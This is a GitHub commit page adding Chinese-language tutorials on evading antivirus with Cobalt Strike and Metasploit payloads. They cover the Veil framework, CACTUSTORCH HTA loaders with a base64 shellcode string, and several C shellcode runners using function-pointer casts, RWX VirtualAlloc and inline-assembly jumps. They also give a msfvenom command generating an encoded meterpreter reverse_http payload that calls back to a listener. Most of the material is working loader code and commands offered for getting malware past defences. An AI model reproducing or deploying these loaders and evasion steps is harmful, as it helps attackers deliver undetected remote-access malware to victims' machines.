-
Notifications
You must be signed in to change notification settings - Fork 590
Commit
This commit does not belong to any branch on this repository, and may belong to a fork outside of the repository.
- Loading branch information
Showing
14 changed files
with
2,555 additions
and
0 deletions.
There are no files selected for viewing
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| Original file line number | Diff line number | Diff line change |
|---|---|---|
| @@ -0,0 +1,70 @@ | ||
| # 0x00 简介 | ||
|
|
||
| AV查杀有几种方式:文件,内存,流量,行为。 | ||
|
|
||
| 以下文章基本都是做的比较简单的免杀,同时CS包含的其他模块可能被杀,我们有几种简单的思路,就不涉及什么定位特征码来做了。 | ||
|
|
||
| 1. 加壳 | ||
|
|
||
| 2. 多平台多语言生成shellcode | ||
|
|
||
| 3. 加密shellcode 加载 | ||
|
|
||
| 4. 插入正常文件 | ||
|
|
||
| 5. 白名单加载 | ||
|
|
||
|
|
||
|
|
||
|
|
||
|
|
||
|
|
||
| # 0x01 框架 | ||
|
|
||
| 这几款是比较热门的,但是感觉效果一般了。 | ||
|
|
||
| 1. Veil https://github.com/Veil-Framework/Veil | ||
|
|
||
| 2. Phantom-Evasion https://github.com/oddcod3/Phantom-Evasion | ||
|
|
||
| 3. shellter https://www.shellterproject.com/download/ | ||
|
|
||
| 4. avet https://github.com/govolution/avet | ||
|
|
||
| 总的来说支持msf的免杀框架都能用来免杀CS,因为他们的通讯是相通的,免杀msf用CS上线也是一样。 | ||
|
|
||
|
|
||
| # 0x02 Veil | ||
|
|
||
|
|
||
| 这里就拿Veil举例,因为Cobalt Strike生成的shellcode有支持他的,Veil的安装太繁琐了,各种出错,推荐使用docker 直接用。 | ||
|
|
||
| >Attacks > Packages > Payload Generator | ||
|
|
||
|  | ||
|
|
||
|
|
||
| Veil-Evasion是veil 的老版本都一样 | ||
|
|
||
|
|
||
|  | ||
|
|
||
| 这里直接选择generate | ||
|
|
||
|  | ||
|
|
||
| 输入2 自定义shellcode | ||
|
|
||
|  | ||
|
|
||
|
|
||
| 然后把刚刚 `Payload Generator` 生成的veil shellcode 输入进去就OK了 工具还提供其他的payload加载方式, | ||
| 免杀效果一般般吧 貌似window defender都过不了 ,人怕出名猪怕壮。 | ||
|
|
||
|
|
||
| # 0x03 文末 | ||
|
|
||
| 不是很推荐用这类的框架,可以学习它的思路来自己写。 | ||
|
|
||
| ### 本文如有错误,请及时提醒,以免误导他人 |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| Original file line number | Diff line number | Diff line change |
|---|---|---|
| @@ -0,0 +1,51 @@ | ||
| # 0x00 简介 | ||
|
|
||
| 在Windows中我们的马还可以是多种形势比如`JavaScript`、`VBScript`、`hta` ,因此出现一个工具DotNetToJScript | ||
| 它可以利用这些脚本文件来加载.NET 然后执行我们的文件。 | ||
|
|
||
| 贴心的大佬们已经给大家准备好了 https://github.com/mdsecactivebreach/CACTUSTORCH | ||
| 上面有各种脚本的利用方式,还有支持 `Cobalt Strike` 的cna文件,但是现在直接引入会被微软的AMSI拦截,推特上有很多大佬的bypass方法大家可以关注一下。 | ||
|
|
||
| 当然它只是一种思路你直接使用AV肯定把你拦截。 | ||
|
|
||
|
|
||
| # 0x01 HTA | ||
|
|
||
| 前面我们讲过`Cobalt Strike` 本身自己也支持生成HTA,所以这里我依旧使用HTA了。 | ||
|
|
||
| 我们需要用到的就是上文的链接的文件 https://github.com/mdsecactivebreach/CACTUSTORCH/blob/master/CACTUSTORCH.hta 其实操作方法已经在里面写好了,还是简单的演示一下。 | ||
|
|
||
|
|
||
| >Attacks > Packages > Payload Generator | ||
| 生成一个raw 的shell code | ||
|
|
||
|  | ||
|
|
||
| 然后用 `cat payload.bin | base64 -w 0` 转成 base64 | ||
|
|
||
| ``` | ||
| ' Replace with binary name that you want to inject into. This can be anything that exists both in SYSWOW64 and SYSTEM32 | ||
| Dim binary : binary = "rundll32.exe" | ||
| ' Base64 encoded 32 bit shellcode | ||
| Dim code : code = "TVroAAAAAFtSRVWJ5YHDcoAAAP/TicNXaAQAAABQ/9Bo8LWiVmgFAAAAUP/TAAAAAAAAAAAAAAAAAAAA8AAAAA4fug4AtAnNIbgBTM0hVGhpcyBwcm9ncmFtIGNhbm5vdCBiZSBydW4gaW4gRE9TIG1vZGUuDQ0KJAAAAAAAAACf0hwW27NyRduzckXbs3JFZvzkRdqzckXF4fZF8rNyRcXh50XIs3JFxeHxRVqzckX8dQlF1LNyRduzc0UGs3JFxeH7RWKzckXF4eBF2rNyRcXh40Xas3JFUmljaNuzckUAAAAAAAAA" | ||
| ``` | ||
|
|
||
| 注释已经写的很清楚了,我们也只需要替换这2处,建议不要用rundll32.exe了 这个某60直接秒了,当然是杀的这个code,所以只需要简单的变化它就认不出来了。 | ||
|
|
||
| 于此同类的还有 | ||
|
|
||
| https://github.com/mdsecactivebreach/SharpShooter | ||
| https://github.com/ridter/AMSI_bypass | ||
|
|
||
|
|
||
| # 0x02 文末 | ||
|
|
||
|
|
||
|
|
||
| ### 本文如有错误,请及时提醒,以免误导他人 | ||
|
|
||
|
|
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| Original file line number | Diff line number | Diff line change |
|---|---|---|
| @@ -0,0 +1,227 @@ | ||
| # 0x00 C加载shellcode | ||
|
|
||
| c语言加载shellcode非常方便,C/C++好用是好用就是头有点凉快。以下加载方法均来自网络 | ||
|
|
||
|
|
||
|
|
||
| 第一种 | ||
|
|
||
|
|
||
| ``` | ||
| #include <windows.h> | ||
| #include <stdio.h> | ||
| #pragma comment(linker,"/subsystem:\"windows\" /entry:\"mainCRTStartup\"") | ||
| unsigned char shellcode[] = | ||
| "\xfc\xe8\x89\x00\x00\x00\x60\x89\xe5\x31\xd2\x64\x8b\x52\x30\x8b" | ||
| "\x52\x0c\x8b\x52\x14\x8b\x72\x28\x0f\xb7\x4a\x26\x31\xff\x31\xc0" | ||
| "\xac\x3c\x61\x7c\x02\x2c\x20\xc1\xcf\x0d\x01\xc7\xe2\xf0\x52\x57"; | ||
| void main() | ||
| { | ||
| ((void(*)(void))&shellcode)(); | ||
| } | ||
| ``` | ||
|
|
||
|
|
||
| 第二种 | ||
|
|
||
|
|
||
| ``` | ||
| #include <windows.h> | ||
| #include <stdio.h> | ||
| #pragma comment(linker,"/subsystem:\"windows\" /entry:\"mainCRTStartup\"") | ||
| unsigned char shellcode[] = | ||
| "\xfc\xe8\x89\x00\x00\x00\x60\x89\xe5\x31\xd2\x64\x8b\x52\x30\x8b" | ||
| "\x52\x0c\x8b\x52\x14\x8b\x72\x28\x0f\xb7\x4a\x26\x31\xff\x31\xc0" | ||
| "\xac\x3c\x61\x7c\x02\x2c\x20\xc1\xcf\x0d\x01\xc7\xe2\xf0\x52\x57"; | ||
| void main() | ||
| { | ||
| PVOID p = NULL; | ||
| if((p = VirtualAlloc(NULL,sizeof(shellcode),MEM_COMMIT|MEM_RESERVE,PAGE_EXECUTE_READWRITE)) == NULL) | ||
| MessageBox(NULL,"VirtuallAlloc Failed!!!","Prompt",MB_OK); | ||
| if(!(memcpy(p,shellcode,sizeof(shellcode)))) | ||
| MessageBox(NULL,"WriteMemory Failed!!!","Prompt",MB_OK); | ||
| CODE code = (CODE)p; | ||
| code(); | ||
| } | ||
| ``` | ||
|
|
||
|
|
||
| 第三种 | ||
|
|
||
|
|
||
| ``` | ||
| #include <windows.h> | ||
| #include <stdio.h> | ||
| #pragma comment(linker,"/subsystem:\"windows\" /entry:\"mainCRTStartup\"") | ||
| unsigned char shellcode[] = | ||
| "\xfc\xe8\x89\x00\x00\x00\x60\x89\xe5\x31\xd2\x64\x8b\x52\x30\x8b" | ||
| "\x52\x0c\x8b\x52\x14\x8b\x72\x28\x0f\xb7\x4a\x26\x31\xff\x31\xc0" | ||
| "\xac\x3c\x61\x7c\x02\x2c\x20\xc1\xcf\x0d\x01\xc7\xe2\xf0\x52\x57"; | ||
| void main() | ||
| { | ||
| __asm | ||
| { | ||
| lea eax,shellcode; | ||
| jmp eax; | ||
| } | ||
| } | ||
| ``` | ||
|
|
||
|
|
||
| 第四种 | ||
|
|
||
|
|
||
| ``` | ||
| #include <windows.h> | ||
| #include <stdio.h> | ||
| #pragma comment(linker,"/subsystem:\"windows\" /entry:\"mainCRTStartup\"") | ||
| unsigned char shellcode[] = | ||
| "\xfc\xe8\x89\x00\x00\x00\x60\x89\xe5\x31\xd2\x64\x8b\x52\x30\x8b" | ||
| "\x52\x0c\x8b\x52\x14\x8b\x72\x28\x0f\xb7\x4a\x26\x31\xff\x31\xc0" | ||
| "\xac\x3c\x61\x7c\x02\x2c\x20\xc1\xcf\x0d\x01\xc7\xe2\xf0\x52\x57"; | ||
| void main() | ||
| { | ||
| __asm | ||
| { | ||
| mov eax,offset shellcode; | ||
| jmp eax; | ||
| } | ||
| } | ||
| ``` | ||
|
|
||
|
|
||
| 第五种 | ||
|
|
||
|
|
||
| ``` | ||
| #include <windows.h> | ||
| #include <stdio.h> | ||
| #pragma comment(linker,"/subsystem:\"windows\" /entry:\"mainCRTStartup\"") | ||
| unsigned char shellcode[] = | ||
| "\xfc\xe8\x89\x00\x00\x00\x60\x89\xe5\x31\xd2\x64\x8b\x52\x30\x8b" | ||
| "\x52\x0c\x8b\x52\x14\x8b\x72\x28\x0f\xb7\x4a\x26\x31\xff\x31\xc0" | ||
| "\xac\x3c\x61\x7c\x02\x2c\x20\xc1\xcf\x0d\x01\xc7\xe2\xf0\x52\x57"; | ||
| void main() | ||
| { | ||
| __asm | ||
| { | ||
| mov eax,offset shellcode; | ||
| _emit 0xFF; | ||
| _emit 0xE0; | ||
| } | ||
| } | ||
| ``` | ||
|
|
||
| 这都是基本加载方法基本已经不过了但是还是提一下, AV 检测中 shellcode 是可以载入内存的,但是不能去执行,执行就会判断为恶意程序也就是我们可以把 | ||
| 它分成2个部分。 | ||
|
|
||
| 1. shellcode 特征 | ||
|
|
||
| 2. 执行shellcode | ||
|
|
||
| 简单的举个例子 | ||
|
|
||
| ``` | ||
| #include <windows.h> | ||
| #include <stdio.h> | ||
| unsigned char shellcode[] = | ||
| "\xfc\xe8\x89\x00\x00\x00\x60\x89\xe5\x31\xd2\x64\x8b\x52\x30\x8b" | ||
| "\x52\x0c\x8b\x52\x14\x8b\x72\x28\x0f\xb7\x4a\x26\x31\xff\x31\xc0" | ||
| "\xac\x3c\x61\x7c\x02\x2c\x20\xc1\xcf\x0d\x01\xc7\xe2\xf0\x52\x57"; | ||
| unsigned char noshellcode[] = ""; | ||
| void main() | ||
| { | ||
| ((void(*)(void))&noshellcode)(); | ||
| } | ||
| ``` | ||
|
|
||
| 这个程序它不会判断为恶意程序,因为我们根本没去执行它,如何免杀呢,我们可以把shellcode加密,然后再解密运行,或者用其他方式来调用它。 | ||
|
|
||
|
|
||
|
|
||
|  | ||
|
|
||
|
|
||
| # 0x01 配合msf shellcode | ||
|
|
||
| MSF框架自带了很多加密方式,在msf5中又添加了更多的加密方式,有兴趣的朋友可以试试,我们知道msf的通讯和cs的通讯协议相通的,所以我们用msf生成shellcode来执行 | ||
|
|
||
| ``` | ||
| msfvenom -p windows/meterpreter/reverse_http -a x86 --platform win LHOST=192.168.130.130 LPORT=8090 -e x86/shikata_ga_nai -i 20 -b '\x00\' -f c >/root/shellcode.c | ||
| ``` | ||
|
|
||
| 生成我们的shellcode 这里我用的vs 2013 | ||
|
|
||
| ``` | ||
| #include "windows.h" | ||
| #include "stdio.h" | ||
| //#pragma comment(linker,"/subsystem:\"windows\" /entry:\"mainCRTStartup\"")//不显示窗口 | ||
| //#pragma comment(linker,"/MERGE:.rdata=.text /MERGE:.data=.text /SECTION:.text,EWR")//减小编译体积 | ||
| //shellcode在生成payload时选择c即可 | ||
| unsigned char shellcode[] = | ||
| "\xdb\xdf\xd9\x74\x24\xf4\xba\x82\x82\xc5\x6d\x5d\x31\xc9\xb1" | ||
| "\xf3\x83\xed\xfc\x31\x55\x16\x03\x55\x16\xe2\x77\x59\x1c\xb4" | ||
| "\x03\x7a\x6b\x1a\x51\x0c\x39\x76\x49\x22\xf7\xc8\x7c\x74\x52" | ||
| "\x3c\xfd\x9a\xa0\x41\xda\xdc\x68\x5f\x85\x72\x3c\x1a\x85\xdd" | ||
| "\x30\xf5\x5b\xad\xc3\xc8\xac\x6a\xea\x17\x5e\xca\x27\xcf\x3a" | ||
| void main() | ||
| { | ||
| LPVOID Memory = VirtualAlloc(NULL, sizeof(shellcode), MEM_COMMIT | MEM_RESERVE, PAGE_EXECUTE_READWRITE); | ||
| memcpy(Memory, shellcode, sizeof(shellcode)); | ||
| ((void(*)())Memory)(); | ||
| } | ||
| ``` | ||
|
|
||
| 其实就是个免杀msf shellcode 只是引用一个思路,为什么要讲这个呢,这就是利用编码器编码shellcode来免杀,但是这些特征已被入库。 | ||
|
|
||
|
|
||
|  | ||
|
|
||
|
|
||
| # 0x02 文末 | ||
|
|
||
| 自己写把CS的shellcode 拿来加密下 在运行也是可行的,但是都是表面免杀,主动还是有问题 。 | ||
|
|
||
| ### 本文如有错误,请及时提醒,以免误导他人 |
Oops, something went wrong.